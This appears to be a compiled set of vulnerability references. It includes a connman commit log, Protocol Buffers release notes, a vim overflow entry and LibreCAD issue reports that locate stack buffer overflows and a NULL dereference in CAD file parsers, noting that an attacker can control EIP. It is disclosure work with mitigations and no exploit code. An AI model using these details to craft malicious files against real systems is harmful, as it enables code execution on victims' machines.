2022-02-21dnsproxy-test: support command line specification of dnsproxy portMatthias Gerstner1\-2/+9 2022-02-21dnsproxy: support programmatic configuration of the default listen portMatthias Gerstner2\-2/+9 2022-02-21.gitignore: also ignore emacs backup filesMatthias Gerstner1\-0/+1 2022-02-21dnsproxy: protocol\_offset: remove error return case and return size\_tMatthias Gerstner1\-27/+14 2022-02-21dnsproxy: remove unnecessarily shadowed variableMatthias Gerstner1\-1/+1 2022-02-21dnsproxy: remove unused domain parameter from \`remove\_server()\`Matthias Gerstner1\-4/+3 2022-02-21iwd: Use same signal strength calculation as wpa\_supplicantJonathan Liu1\-1/+3 2022-02-21iwd: Fix typo in warning message when enabling AccessPoint modeJonathan Liu1\-1/+1 2022-02-21wifi: Duplicate GSupplicantSSID pointer membersNiel Fourie2\-39/+83 2022-01-28Release 1.411.41Marcel Holtmann2\-1/+9 2022-01-25unit: Fix missing declarations in test-iptablesEmmanuel VAUTRIN1\-2/+2 2022-01-25AUTHORS: Add Matthias' contributionsDaniel Wagner1\-0/+1 2022-01-25dnsproxy: Keep timeout in TCP case even after connection is establishedMatthias Gerstner1\-5/+0 2022-01-25dnsproxy: Avoid 100 % busy loop in TCP server caseMatthias Gerstner1\-0/+12 2022-01-25dnsproxy: Validate input data before using themDaniel Wagner1\-5/+26 2022-01-25dnsproxy: Update TCP length headerMatthias Gerstner1\-0/+3 2022-01-25main: Use g\_strdup for online\_check\_ipv{4,6}\_url configDaniel Wagner1\-2/+9 2022-01-23service: Fix native connection with wrong passphraseEmmanuel VAUTRIN1\-0/+9 2022-01-21iwd: Mark only reachable networks as availableEmmanuel VAUTRIN1\-1/+3 2022-01-21iwd: Fix connection with no passphraseEmmanuel VAUTRIN1\-0/+2 2022-01-21iwd: Fix station in scan callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-12-19AUTHORS: Mention Christian's contributionsDaniel Wagner1\-0/+1 2021-12-19ipconfig: Do not enable/disable ipv6 for all ifsChristian Taedcke1\-0/+6 2021-12-19Add ObjectManager interface to connmanMichael Trimarchi1\-1/+1 2021-11-18service: Support hot-plug of technologies by updating ipconfig indexJussi Laakkonen1\-2/+15 2021-11-18openvpn: Improve configuration value processingJussi Laakkonen1\-44/+76 2021-11-18vpn-provider: Support checking if provider setting key exists.Jussi Laakkonen2\-0/+8 2021-10-26tether: Fix connman\_technology\_get\_wifi\_tetheringMichael Trimarchi1\-2/+6 2021-10-20dnsproxy: Fix uninitialized false positive in dnsproxyEmmanuel VAUTRIN1\-1/+1 2021-10-20tools: Fix uninitialized errors in iptables testsEmmanuel VAUTRIN2\-2/+2 2021-10-20config: Cleanup of iwd provision\_service\_wifi()Emmanuel VAUTRIN1\-4/+2 2021-10-15gsupplicant: Fix error return typeDaniel Wagner1\-2/+2 2021-10-15inet: Remove unused ipv6\_addr\_advert\_multDaniel Wagner1\-7/+0 2021-10-15build: Only enable -Wcast-align for gccDaniel Wagner1\-1/+3 2021-10-15client: Update the connmactl to support optional tethering channelMichael Trimarchi1\-14/+46 2021-10-15tethering: Add TetheringFreq parameter documentationMichael Trimarchi1\-0/+7 2021-10-15tethering: Add possibility to configure the access point frequencyMichael Trimarchi5\-7/+52 2021-10-15tethering: Reduce the number of parameters of tech\_set\_tetheringMichael Trimarchi8\-32/+33 2021-10-04AUTHORS: Mention Michael's contributionsDaniel Wagner1\-0/+1 2021-10-04manager: Add TetheringClientsChanged GBUS\_SIGNALMichael Trimarchi1\-0/+3 2021-10-04service: Report errors to user in native modeVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-10-04iwd: Fix timeout error on new connectionVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-10-04iwd: Fix improper IPv4/6 attributes when disconnectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+2 2021-10-04iwd: Fix missing Ethernet attributesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+8 2021-09-13doc: Document AuthErrorLimit in VPN connection APIJussi Laakkonen1\-0/+13 2021-09-13openvpn: Default to 10 AuthErrorLimit unless set by userJussi Laakkonen1\-0/+9 2021-09-13vpn-provider: Add auth error check heuristic to avoid losing credsJussi Laakkonen2\-0/+112 2021-09-13vpn-provider: Ignore error adding when state is idle/unknownJussi Laakkonen1\-0/+15 2021-09-13vpn: Report EALREADY back to caller if VPN is already disconnectingJussi Laakkonen1\-1/+2 2021-09-13gsupplicant: Add support for WPA3-Personal transition modeAriel D'Alessandro1\-10/+19 2021-08-31doc: Add new openconnect input fieldsLukáš Karas1\-0/+13 2021-08-30openconnect: Add support for 2nd passwordLukáš Karas2\-2/+85 2021-08-30vpn: Refactor connect\_reply() and handle NoCarrier -> ENOLINK errorJussi Laakkonen1\-2/+12 2021-08-30vpn-provider: Implement connmand online state checkingJussi Laakkonen1\-1/+356 2021-08-30service: Do not trigger wispr start when EnableOnlineCheck is disabledDaniel Wagner1\-0/+6 2021-08-30service: Move wispr start code into helperDaniel Wagner1\-16/+15 2021-08-29network: Do not disconnect decice on network connectDaniel Wagner1\-2/+0 2021-08-29service: Prevent auto connection during passphrase requestVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+25 2021-08-29wispr: Add online check url config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-15/+68 2021-08-29service: Fix default service update on ready stateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+2 2021-08-29service: Ignore state information in service reorderingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-2/+1 2021-08-17pptp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-43/+84 2021-08-17l2tp: Improve invalid auth and disconnect notify, fix cb useJussi Laakkonen1\-40/+75 2021-08-17l2tp: Create control file for xl2tpdMatt Vogt1\-2/+16 2021-07-28gdhcp: Do not process missing DHCP\_SERVER\_ID fieldsDaniel Wagner1\-0/+5 2021-07-26service: service\_update\_preferred\_order cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-17/+5 2021-07-20AUTHORS: Fix Rahul's email addressDaniel Wagner1\-1/+1 2021-07-20main: Fix a memory leak for str\_list in parse\_configRahul Jain1\-0/+2 2021-07-02service: apply\_relevant\_default\_downgrade cleanupVAUTRIN Emmanuel (Canal Plus Prestataire)1\-7/+3 2021-07-02service: Let PreferredTechnologies overrule connected service sortingDaniel Wagner1\-13/+27 2021-06-30agent: Always inform upper layer via callbackDaniel Wagner1\-1/+1 2021-06-23service: Ask for password when using native autoconnectDaniel Wagner1\-1/+2 2021-06-23iwd: Do not try to handle out of memory failsDaniel Wagner1\-38/+6 2021-06-23vpn-rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-23rtnl: Fix netlink message alignmentDaniel Wagner1\-63/+62 2021-06-21README: Add IRC channel infoDaniel Wagner1\-0/+4 2021-06-21AUTHORS: Mention Lukáš' contributionsDaniel Wagner1\-0/+1 2021-06-21dnsproxy: Replace strncopy by memcpyLukáš Karas1\-1/+1 2021-06-14AUTHORS: Mention Ariel's contributionsDaniel Wagner1\-0/+1 2021-06-14wifi: Add wpa\_supplicant WPA3-SAE supportAriel D'Alessandro3\-3/+57 2021-06-10Release 1.401.40Marcel Holtmann2\-1/+6 2021-06-09AUTHORS: Mention Alyssa's contributionsDaniel Wagner1\-0/+1 2021-06-09README: fix typoAlyssa Ross1\-1/+1 2021-06-07AUTHORS: Mention Valery's contributionsDaniel Wagner1\-0/+1 2021-06-07dnsproxy: Check the length of buffers before memcpyValery Kashcheev1\-9/+11 2021-06-02README: Update mailing list infoDaniel Wagner1\-2/+8 2021-05-14README: Remove the 01.org website and the 01.org JiraMarcel Holtmann1\-5/+1 2021-05-13main: Cleanup of vendor class id and wifi config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)7\-46/+10 2021-05-05wispr: Support of common redirection status codesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+5 2021-04-27timerserver: Fix time update manual->autoDaniel Wagner1\-2/+2 2021-04-25service: Disable native autoconnect calls for providersDaniel Wagner1\-2/+2 2021-04-18peer: Open code g\_memdupDaniel Wagner1\-1/+4 2021-04-18wifi: Open code g\_memdupDaniel Wagner1\-7/+18 2021-04-18Rewrite openconnect plugin to use libopenconnectSanttu Lakkala3\-382/+525 2021-04-18service: Teach autoconnect algorithm native modeDaniel Wagner2\-29/+56 2021-04-18network: Add \_\_connman\_network\_native\_autoconnect()Daniel Wagner2\-0/+8 2021-04-18iwd: Filter out connect failure for auto connect modeDaniel Wagner1\-1/+1 2021-04-18iwd: Init AutoConnect of know networksDaniel Wagner1\-0/+26 2021-04-18service: Factor auto connect trigger code into a new functionDaniel Wagner1\-34/+40 2021-04-18service: Remove unused \_\_connman\_service\_disconnect\_all()Daniel Wagner2\-31/+0 2021-04-05wireguard: Copy interfance names obeying lengths rulesDaniel Wagner1\-1/+1 2021-04-05ethernet: Copy interfance names obeying lengths rulesDaniel Wagner1\-5/+7 2021-04-05ipconfig: Refactor /proc value get/set to separate functionsJussi Laakkonen1\-85/+97 2021-04-05service: Sort VPNs using the transport service if connectedJussi Laakkonen1\-0/+45 2021-04-05provider: Add function to get transport ident from VPNJussi Laakkonen2\-0/+11 2021-04-05vpn: Return transport ident with get\_property()Jussi Laakkonen1\-7/+15 2021-03-27dnsproxy: Enable DNS servers on connected VPN if split routing changesJussi Laakkonen1\-0/+11 2021-03-27timeserver: Fix false error messageJustin Maggard1\-1/+1 2021-03-27iwd: Fix typo in error message when stopping AccessPoint modeJonathan Liu1\-1/+1 2021-03-27service: Allow only user connection after WiFi failureVAUTRIN Emmanuel (Canal Plus Prestataire)1\-4/+10 2021-03-27service: Fix disconnection search before connectingVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+1 2021-03-27service: Complete only after user connection retriesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+3 2021-03-27mailmap: Update non-canonical log entriesDaniel Wagner1\-0/+3 2021-02-24service: Add online to ready transition featureEmmanuel VAUTRIN6\-13/+78 2021-02-22service: Fix integer type for online check intervalDaniel Wagner1\-3/+3 2021-02-15service: Add online check interval config optionsVAUTRIN Emmanuel (Canal Plus Prestataire)5\-19/+88 2021-02-15wifi: Reset disconnecting status of any networkVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-10wifi: Check valid network in disconnect callbackVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-08Release 1.391.39Marcel Holtmann2\-1/+7 2021-02-05AUTHORS: Mention Colin's contributionsDaniel Wagner1\-0/+1 2021-02-05dnsproxy: Add length checks to prevent buffer overflowColin Wee1\-3/+11 2021-02-05gdhcp: Avoid leaking stack data via unitiialized variableColin Wee1\-1/+1 2021-02-05gdhcp: Avoid reading invalid data in dhcp\_get\_optionColin Wee4\-20/+38 2021-02-05service: Restart online check when default service changesVAUTRIN Emmanuel (Canal Plus Prestataire)1\-0/+10 2021-02-05timeserver: Reset time sync on system timeserver updateVAUTRIN Emmanuel (Canal Plus Prestataire)1\-1/+2 2021-02-05clock: Add TimeSynced signal emitted when the system time has been syncedVAUTRIN Emmanuel (Canal Plus Prestataire)4\-1/+67 2021-01-25AUTHORS: Mention Gabriel's contributionsDaniel Wagner1\-0/+1 2021-01-25wifi: Always disconnect connection completelyGabriel FORTE1\-8/+37 2020-12-28timeserver: Split new service and configuration updateDaniel Wagner3\-27/+33 2020-12-28services: Escape passphrase stringDaniel Wagner2\-7/+17 2020-12-23wifi: Base BSS expiration age on long scanning intervalEmmanuel VAUTRIN1\-0/+21 2020-12-22wifi: Fix wireless interface not being added to tether bridge sometimesJonathan Liu1\-4/+5 2020-12-22openvpn: Update documemtation for --protoDaniel Wagner1\-1/+1 2020-12-22vpnc: Do not lose credentials with VPN agent timeoutsJussi Laakkonen1\-6/+15 2020-12-14vpn: Export vpn\_ipconfig\_foreach as linker symbolDaniel Wagner4\-4/+4 2020-12-14vpn: Do not do mixed declerations and codeDaniel Wagner1\-18/+14 2020-12-14src: Test return value of inet\_pton consistentlyDaniel Wagner5\-17/+17 2020-12-11doc: Document VPN connection SplitRouting booleanJussi Laakkonen1\-1/+8 2020-12-11vpn-provider: Support SplitRouting option from connmandJussi Laakkonen1\-21/+158 2020-12-11vpn-provider: Drop route management from vpndJussi Laakkonen5\-100/+13 2020-12-11vpn-config: Implement function to get boolean from keyfileJussi Laakkonen2\-4/+21 2020-12-11vpn: Support SplitRouting in D-Bus variables, improve route codeJussi Laakkonen1\-20/+207 2020-12-11provider: Add support for managing SplitRoutingJussi Laakkonen2\-0/+105 2020-12-11service: Load and apply service settings after D-Bus registrationJussi Laakkonen1\-3/+3 2020-12-11service: Add property changed signal for SplitRouting valueJussi Laakkonen2\-0/+25 2020-12-11service: Expose set\_split\_routing() for internal useJussi Laakkonen2\-10/+15 2020-12-11service: Split service move functionality for internal useJussi Laakkonen2\-16/+46 2020-12-11dbus: Report back the return value of g\_dbus\_send\_message()Jussi Laakkonen1\-18/+6 2020-12-11inet: Do not add broadcast address for P2P/VPNsJussi Laakkonen20\-36/+123 2020-12-11inet: Refactor with getifaddrs() and add network route getter functionJussi Laakkonen2\-243/+326 2020-12-11inet: Add function for detecting a default routeJussi Laakkonen2\-0/+17 2020-12-11connection: Add getter for the phy index of a VPN transport serviceJussi Laakkonen2\-0/+24 2020-12-11wispr: check service before stopping portal detectionSergey Matyukevich1\-1/+17 2020-12-11AUTHORS: Mention Boleslaw's contributionsDaniel Wagner1\-0/+1 2020-12-11neard: Fix memory leaks with PendingCallBoleslaw Tokarski1\-1/+1 2020-12-11vpn: Fix memory leaks with PendingCallBoleslaw Tokarski1\-11/+30 2020-12-11vpn: Secure a race condition with flagBoleslaw Tokarski1\-2/+8 2020-12-11Revert "gdhcp: Make DHCP client timeouts suspend aware"Daniel Wagner2\-134/+52 2020-12-04vpn-provider: Cancel agent requests when removing VPNJussi Laakkonen1\-0/+6 2020-12-04AUTHORS: Mention Emmanuel's contributionsDaniel Wagner1\-0/+1 2020-12-04services: Return error for invalid hidden namesEmmanuel Vautrin1\-8/+12 2020-12-04AUTHORS: Mention Pieter's contributionsDaniel Wagner1\-0/+1 2020-12-04rtnl: Mark dsa interfaces as ethernet typePieter Cardoen1\-0/+3

CVE-2022-23098: connman/connman.git - Connection Manager

Nullptr dereference when a null char is present in a proto symbol. The symbol is parsed incorrectly, leading to an unchecked call into the proto file's name during generation of the resulting error message. Since the symbol is incorrectly parsed, the file is nullptr. We recommend upgrading to version 3.15.0 or greater.

**Protocol Compiler**

*   Optional fields for proto3 are enabled by default, and no longer require  
    the --experimental\_allow\_proto3\_optional flag.

**C++**

*   MessageDifferencer: fixed bug when using custom ignore with multiple  
    unknown fields
*   Use init\_seg in MSVC to push initialization to an earlier phase.
*   Runtime no longer triggers -Wsign-compare warnings.
*   Fixed -Wtautological-constant-out-of-range-compare warning.
*   DynamicCastToGenerated works for nullptr input for even if RTTI is disabled
*   Arena is refactored and optimized.
*   Clarified/specified that the exact value of Arena::SpaceAllocated() is an  
    implementation detail users must not rely on. It should not be used in  
    unit tests.
*   Change the signature of Any::PackFrom() to return false on error.
*   Add fast reflection getter API for strings.
*   Constant initialize the global message instances
*   Avoid potential for missed wakeup in UnknownFieldSet
*   Now Proto3 Oneof fields have "has" methods for checking their presence in  
    C++.
*   Bugfix for NVCC
*   Return early in \_InternalSerialize for empty maps.
*   Adding functionality for outputting map key values in proto path logging  
    output (does not affect comparison logic) and stop printing 'value' in the  
    path. The modified print functionality is in the  
    MessageDifferencer::StreamReporter.
*   Fixed #8129
*   Ensure that null char symbol, package and file names do not result in a  
    crash.
*   Constant initialize the global message instances
*   Pretty print 'max' instead of numeric values in reserved ranges.
*   Removed remaining instances of std::is\_pod, which is deprecated in C++20.
*   Changes to reduce code size for unknown field handling by making uncommon  
    cases out of line.
*   Fix std::is\_pod deprecated in C++20 (#7180)
*   Fix some -Wunused-parameter warnings (#8053)
*   Fix detecting file as directory on zOS issue #8051 (#8052)
*   Don't include sys/param.h for \_BYTE\_ORDER (#8106)
*   remove CMAKE\_THREAD\_LIBS\_INIT from pkgconfig CFLAGS (#8154)
*   Fix TextFormatMapTest.DynamicMessage issue#5136 (#8159)
*   Fix for compiler warning issue#8145 (#8160)
*   fix: support deprecated enums for GCC < 6 (#8164)
*   Fix some warning when compiling with Visual Studio 2019 on x64 target (#8125)

**Python**

*   Provided an override for the reverse() method that will reverse the internal  
    collection directly instead of using the other methods of the BaseContainer.
*   MessageFactory.CreateProtoype can be overridden to customize class creation.
*   Fix PyUnknownFields memory leak (#7928)
*   Add macOS big sur compatibility (#8126)

**JavaScript**

*   Generate getDescriptor methods with * as their this type.
*   Enforce let/const for generated messages.
*   js/binary/utils.js: Fix jspb.utils.joinUnsignedDecimalString to work with negative bitsLow and low but non-zero bitsHigh parameter. (#8170)

**PHP**

*   Added support for PHP 8. (#8105)
*   unregister INI entries and fix invalid read on shutdown (#8042)
*   Fix PhpDoc comments for message accessors to include "|null". (#8136)
*   fix: convert native PHP floats to single precision (#8187)
*   Fixed PHP to support field numbers >=2\*\*28. (#8235)
*   feat: add support for deprecated fields to PHP compiler (#8223)
*   Protect against stack overflow if the user derives from Message. (#8248)
*   Fixed clone for Message, RepeatedField, and MapField. (#8245)
*   Updated upb to allow nonzero offset minutes in JSON timestamps. (#8258)

**Ruby**

*   Added support for Ruby 3. (#8184)
*   Rewrote the data storage layer to be based on upb\_msg objects from the  
    upb library. This should lead to much better parsing performance,  
    particularly for large messages. (#8184).
*   Fill out JRuby support (#7923)
*   \[Ruby\] Fix: (SIGSEGV) gRPC-Ruby issue on Windows. memory alloc infinite  
    recursion/run out of memory (#8195)
*   Fix jruby support to handle messages nested more than 1 level deep (#8194)

**Java**

*   Avoid possible UnsupportedOperationException when using CodedInputSteam  
    with a direct ByteBuffer.
*   Make Durations.comparator() and Timestamps.comparator() Serializable.
*   Add more detailed error information for dynamic message field type  
    validation failure
*   Removed declarations of functions declared in java\_names.h from  
    java\_helpers.h.
*   Now Proto3 Oneof fields have "has" methods for checking their presence in  
    Java.
*   Annotates Java proto generated \*\_FIELD\_NUMBER constants.
*   Add -assumevalues to remove JvmMemoryAccessor on Android.

**C#**

*   Fix parsing negative Int32Value that crosses segment boundary (#8035)
*   Change ByteString to use memory and support unsafe create without copy (#7645)
*   Optimize MapField serialization by removing MessageAdapter (#8143)
*   Allow FileDescriptors to be parsed with extension registries (#8220)
*   Optimize writing small strings (#8149)

CVE-2021-22570: Release Protocol Buffers v3.15.0 · protocolbuffers/protobuf

Heap-based Buffer Overflow in GitHub repository vim/vim prior to 8.2.

CVE-2022-0359: Heap-based Buffer Overflow in vim

In LibreCAD 2.2.0, a NULL pointer dereference in the HATCH handling of libdxfrw allows an attacker to crash the application using a crafted DXF document.

**Steps to reproduce or sample file**

1.  Unzip and load the attached proof of concept file in LibreCAD 2.2.0-rc3

**Cause**

The std::shared_ptr DRW_Hatch::loop is written to when loading a HATCH entity with code 93. If this occurs before a code 92, the pointer is still NULL, leading to a crash.

**Impact**

Denial of service.

**Proposed Mitigation**

Ensure that DRW_Hatch::loop is not NULL before dereferencing at drw_entities.cpp:1808

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45343: NULL pointer dereference in DXF parser, HATCH code 93 · Issue #1468 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataList of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0 in a debugger
    
2.  File/Open...
    
3.  Unzip and open the attached proof-of-concept file
    
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)
    

Screenshot:

**Cause**

The CDataList entity deserialization in LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to a stack buffer overflow. char buf[512] declared in CDataList::Serialize() on line 784 is of fixed size 512. One variety of CDataList provides its own size field, as seen on line 795 and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables, including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Note**: This is similar to, but distinct from issue #1462

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataList::Serialize(), and refuse to load more data to buf than actually supported.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

CVE-2021-45342: Remote Code Execution vulnerability in LibreCAD 2.2.0-rc3 (JWW CDataList) · Issue #1464 · LibreCAD/LibreCAD

A buffer overflow vulnerability in CDataMoji of the jwwlib component of LibreCAD 2.2.0-rc3 and older allows an attacker to achieve Remote Code Execution using a crafted JWW document.

**Vulnerable Products**

*   LibreCAD 2.2.0-rc3 and older
*   Jw\_cad 8.24a and older

**Steps to reproduce or sample file**

1.  Start LibreCAD 2.2.0-rc3 in a debugger
2.  File/Open...
3.  Unzip and open the attached proof of concept file
4.  Observe ACCESS_VIOLATION crash, with eip=0x41414141 (AAAA)

Screenshot:

**Cause**

The CDataMoji entity deserialization at LibreCAD/libraries/jwwlib/src/jwwdoc.h is vulnerable to  
a stack buffer overflow.  
char buf[512] declared in CDataMoji::Serialize() on line 512  
is of fixed size 512. Some varieties of CDataMoji provide their own size, e.g. MojiData2 on line 523  
and no bounds checking is performed. This allows an attacker to overflow buf and overwrite other stack variables,  
including the return address.

The attached PoC file is tuned to trigger this behavior in the latest windows release of LibreCAD, but the same bug is also present  
in older versions and on other platforms.

**Impact**

An attacker can craft a JW-CAD input file and thereby gain control over execution flow (EIP controlled directly).

This allows an attacker to run arbitrary code on the system running LibreCAD, with the privileges of the current user.

**Proposed Mitigation**

1.  Perform bounds checking in CDataMoji::Serialize(), and refuse to load the file if it would overflow buf.
2.  Enable stack smashing protection in the windows build of LibreCAD.

**Operating System and LibreCAD version info**

Version: 2.2.0-rc3  
Compiler: GNU GCC 7.3.0  
Compiled on: Nov 29 2021  
Qt Version: 5.12.4  
Boost Version: 1.65.1  
System: Windows 10 (10.0)

Tag

#c++